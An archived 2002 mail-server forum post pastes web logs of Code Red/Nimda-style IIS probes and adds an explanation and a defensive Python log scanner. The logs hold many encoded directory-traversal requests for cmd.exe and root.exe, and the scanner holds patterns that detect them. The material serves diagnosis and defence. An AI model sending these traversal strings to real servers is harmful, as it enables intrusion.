Hi,

Recently our iMail server bogs down about every 3 days to the point where mail delivery is delayed. I determined that restarting WEB Messaging fixes the problem until it happens again. The following are some WEB log entries that indicate an attack from a client browser, but I don't know enough about HTML (and HTML viruses) to know exactly what is happening:
********* log file *********
20020305 200746 Info - 192.168.1.6 GET / HTTP/1.0.
20020305 200806 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) GET /login.cgi?_ HTTP/1.1.
20020305 200806 Request processed with no referer and user agent 192.168.1.1.
20020305 200806 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/login.cgi?_ GET /imailc.gif HTTP/1.1.
20020305 200806 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/login.cgi?_ GET /imailc.gif HTTP/1.1.
20020305 200812 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/login.cgi?_ POST /login.cgi HTTP/1.1.
20020305 200812 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/login.cgi?_ GET /Xaee99bcbcf9cc89f9ac96a02abab/menu.cgi HTTP/1.1.
20020305 200815 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/menu.cgi GET /Xaee99bcbcf9cc89f9ac96a02abab/imailc.gif HTTP/1.1.
20020305 200819 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/menu.cgi GET /Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main GET /Xaee99bcbcf9cc89f9ac96a02abab/del.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main GET /Xaee99bcbcf9cc89f9ac96a02abab/descend.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main GET /Xaee99bcbcf9cc89f9ac96a02abab/mail.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main GET /Xaee99bcbcf9cc89f9ac96a02abab/bottom.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main GET /Xaee99bcbcf9cc89f9ac96a02abab/top.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main GET /Xaee99bcbcf9cc89f9ac96a02abab/attach.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main GET /Xaee99bcbcf9cc89f9ac96a02abab/replied.gif HTTP/1.1.
20020305 200846 Info - 192.168.1.6 GET / HTTP/1.0.
20020305 200947 Info - 192.168.1.6 GET / HTTP/1.0.
20020305 201047 Info - 192.168.1.6 GET / HTTP/1.0.
[snip log] ....
20020305 224557 Info - 192.168.1.6 GET / HTTP/1.0.
20020305 224658 Info - 192.168.1.6 GET / HTTP/1.0.
20020305 224758 Info - 192.168.1.6 GET / HTTP/1.0.
20020305 224859 Info - 192.168.1.6 GET / HTTP/1.0.
20020305 224923 Info - 192.168.1.1 GET /scripts/root.exe?/c+dir HTTP/1.0.
20020305 224923 Request processed with no user agent and no referer.
20020305 224924 Info - 192.168.1.1 GET /MSADC/root.exe?/c+dir HTTP/1.0.
20020305 224924 Request processed with no user agent and no referer.
20020305 224925 Info - 192.168.1.1 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224925 Request processed with no user agent and no referer.
20020305 224927 Info - 192.168.1.1 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224927 Request processed with no user agent and no referer.
20020305 224928 Info - 192.168.1.1 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224928 Request processed with no user agent and no referer.
20020305 224930 Info - 192.168.1.1 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224930 Request processed with no user agent and no referer.
20020305 224931 Info - 192.168.1.1 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224931 Request processed with no user agent and no referer.
20020305 224933 Info - 192.168.1.1 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224933 Request processed with no user agent and no referer.
20020305 224934 Info - 192.168.1.1 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224934 Request processed with no user agent and no referer.
20020305 224936 Info - 192.168.1.1 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224936 Request processed with no user agent and no referer.
20020305 224937 Info - 192.168.1.1 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224937 Request processed with no user agent and no referer.
20020305 224939 Info - 192.168.1.1 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224939 Request processed with no user agent and no referer.
20020305 224940 Info - 192.168.1.1 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224940 Request processed with no user agent and no referer.
20020305 224941 Info - 192.168.1.1 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224941 Request processed with no user agent and no referer.
20020305 224943 Info - 192.168.1.1 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224943 Request processed with no user agent and no referer.
20020305 224945 Info - 192.168.1.1 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224945 Request processed with no user agent and no referer.
20020305 224959 Info - 192.168.1.6 GET / HTTP/1.0.
[snip log] ....
20020305 231009 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type.
20020305 231109 Info - 192.168.1.6 GET / HTTP/1.0.
20020305 231109 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type.
20020305 231210 Info - 192.168.1.6 GET / HTTP/1.0.
20020305 231210 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type.
20020305 231311 Info - 192.168.1.6 GET / HTTP/1.0.
20020305 231311 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type.
20020305 231411 Info - 192.168.1.6 GET / HTTP/1.0.
20020305 231411 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type.
20020305 231512 Info - 192.168.1.6 GET / HTTP/1.0.
********* log file *********

Our mail server is in a DMZ where external HTTP requests are mapped from 80 to 8383. Could someone tell me what these log entries indicate and how to prevent this?

Regards,
Dan

Please visit http://www.ipswitch.com/support/mailing-lists.html to be removed from this list.
An Archive of this list is available at: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
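The burst of requests from 192.168.1.1 between 224923 and 224945 (root.exe, cmd.exe?/c+dir, and the `..%255c..`, `..%c1%1c..`, `..%%35%63..` path variants) is the directory-traversal probe sequence that the Code Red II and Nimda worms sent to IIS: each variant is a differently encoded `..\` that relied on IIS decoding the URL twice, or accepting a 0xC0/0xC1 lead byte as an overlong UTF-8 encoding of `/` or `\`. The later `Socket Error ... 10055` lines are Winsock WSAENOBUFS ("no buffer space available"), a resource-exhaustion symptom on the server rather than anything the request content does. The script below is an added example for this thread, not code from the original post or from Ipswitch: it parses the IMail web log format shown above, decodes each path to a fixed point, and classifies requests by the traversal and encoding tricks they use, so a defender can count probes per source and separate them from the once-a-minute `GET /` from 192.168.1.6. The sample lines are copied from the post; the finding labels and the three-round decode limit are my own choices.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# IMail web log line: "YYYYMMDD HHMMSS Level - ip <agent/referer> METHOD path HTTP/x.y."
# The "Request processed with no user agent ..." lines have no " - " and are skipped.
LOG_RE = re.compile(
    r"^(?P<date>\d{8}) (?P<time>\d{6}) (?P<level>[A-Za-z ]+?) - "
    r"(?P<ip>\d+\.\d+\.\d+\.\d+) (?P<rest>.*?)\.?$"
)
REQ_RE = re.compile(
    r"(?:(?P<agent_ref>.*?) )?(?P<method>GET|POST|HEAD) (?P<path>\S+) HTTP/\d\.\d$"
)

# Constructed sample: a subset of the lines quoted in the post.
SAMPLE_LINES = [
    "20020305 200746 Info - 192.168.1.6 GET / HTTP/1.0.",
    "20020305 200806 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) GET /login.cgi?_ HTTP/1.1.",
    "20020305 200806 Request processed with no referer and user agent 192.168.1.1.",
    "20020305 224923 Info - 192.168.1.1 GET /scripts/root.exe?/c+dir HTTP/1.0.",
    "20020305 224925 Info - 192.168.1.1 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0.",
    "20020305 224928 Info - 192.168.1.1 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.",
    "20020305 224934 Info - 192.168.1.1 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.",
    "20020305 224940 Info - 192.168.1.1 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.",
    "20020305 231009 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type.",
    "20020305 231109 Info - 192.168.1.6 GET / HTTP/1.0.",
]


def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly until nothing changes, returning raw bytes.

    Decoding more than once models a server that decodes the path twice, which is
    exactly what %255c ("%25" -> "%", then "%5c" -> "\\") and %%35%63 rely on.
    Bytes are kept as bytes so overlong UTF-8 lead bytes (0xC0/0xC1) survive.
    """
    data = path.encode("latin-1")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data


def classify(path):
    """Return the set of probe characteristics found in one request path."""
    findings = set()
    decoded = fully_decode(path)
    lower = decoded.lower()
    if b"cmd.exe" in lower or b"root.exe" in lower:
        findings.add("command-shell-request")
    if b"../" in lower or b"..\\" in lower:
        findings.add("directory-traversal")
    # 0xC0 and 0xC1 can never start a valid UTF-8 sequence; their presence means
    # an overlong encoding such as %c0%af ('/') or %c1%9c ('\') was attempted.
    if any(b in (0xC0, 0xC1) for b in decoded):
        findings.add("overlong-utf8")
    # "%25" or "%%" in the raw path means the request only resolves after a second decode.
    if "%25" in path.lower() or "%%" in path:
        findings.add("double-encoding")
    return findings


def scan(lines):
    """Walk log lines; count requests and socket errors, list probe requests."""
    report = {"requests": 0, "socket_errors": 0, "probes": []}
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        if m["level"] == "Socket Error":
            report["socket_errors"] += 1
            continue
        r = REQ_RE.match(m["rest"])
        if not r:
            continue
        report["requests"] += 1
        findings = classify(r["path"])
        if findings:
            report["probes"].append((m["time"], m["ip"], r["path"], sorted(findings)))
    return report


def probes_per_source(report):
    """Count flagged requests by source address; useful for a firewall review."""
    return Counter(ip for _, ip, _, _ in report["probes"])


if __name__ == "__main__":
    rep = scan(SAMPLE_LINES)
    print(f"{rep['requests']} requests, {rep['socket_errors']} socket errors")
    for time, ip, path, findings in rep["probes"]:
        print(time, ip, path, ", ".join(findings))
    print(dict(probes_per_source(rep)))
```

Because the probes target IIS paths (`/scripts`, `/msadc`, `/_vti_bin`, `/winnt/system32/cmd.exe`), a web server that is not IIS only logs them; the useful outcomes of running this over a full day's log are the per-source probe counts for blocking at the DMZ firewall and the socket-error count, which tracks the buffer-exhaustion condition separately from the scan traffic.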
